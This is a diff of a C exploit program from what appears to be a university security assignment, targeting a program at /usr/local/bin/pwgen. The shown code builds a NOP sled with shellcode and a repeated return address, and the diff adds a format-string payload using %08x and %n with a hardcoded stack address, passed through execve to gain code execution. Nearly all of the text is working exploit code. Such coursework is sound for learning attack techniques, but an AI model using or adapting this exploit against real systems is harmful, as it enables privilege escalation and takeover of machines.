--- a/Assignement 1/sploit5.c.save.2
+++ b/Assignement 1/sploit5.c.save.2
@@ -1,3 +1,4 @@
+
 /*
  * dummy exploit program
  */
@@ -7,7 +8,7 @@
 #include <unistd.h>
 #include </usr/local/src/shellcode.h>
 
-#define DBSIZE 700
+#define DBSIZE 562
 #define DOFFSET 0
 #define TARGET "/usr/local/bin/pwgen"
 #define NOP   0x90
@@ -22,9 +23,12 @@ int main(int argc, char *argv[])
   // one way to invoke pwgen, system() creates a separate process
   int i;
   int bsize = DBSIZE, offset = DOFFSET;
-
+  char payload[] = 
+"AAAAAAAA_\xdc\xd9\xbf\xff BBBBB %08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%n";
  
 
+  if(argc > 1) bsize = atoi(argv[1]);
+    if(argc > 2) offset = atoi(argv[2]);
 
   if(!(buf = malloc(bsize))){
     printf("error");
@@ -38,20 +42,17 @@ int main(int argc, char *argv[])
   addr_ptr = (long *) ptr;
   for (i = 0; i < bsize; i+=4)
   *(addr_ptr++) = 0xbfd7dfff;
- for(i = 0 ; i < bsize/2 ; i++)
- buf[i] = NOP;
+  for(i = 0 ; i < bsize/2 ; i++)
+  buf[i] = NOP;
 
   ptr = buf + ((bsize/2)  - (strlen(shellcode)/2 ));
   for (i = 0 ; i <strlen(shellcode);i++)
       *(ptr++) = shellcode[i];
 
-   
-    buf[bsize - 1] = '\0';//jump here. not overwrite here.
-   
- 
-   
-    args[0] = buf; args[1] = "-h";
-    args[2] = NULL; 
+  
+    buf[bsize - 1] = '\0';//jump here. not overwrite here.   
+    args[0] = payload; args[1] = "-h";
+    args[2] = buf; 
 args[3] = NULL;
     env[0] = NULL;
   // execve() executes the target program by overwriting the
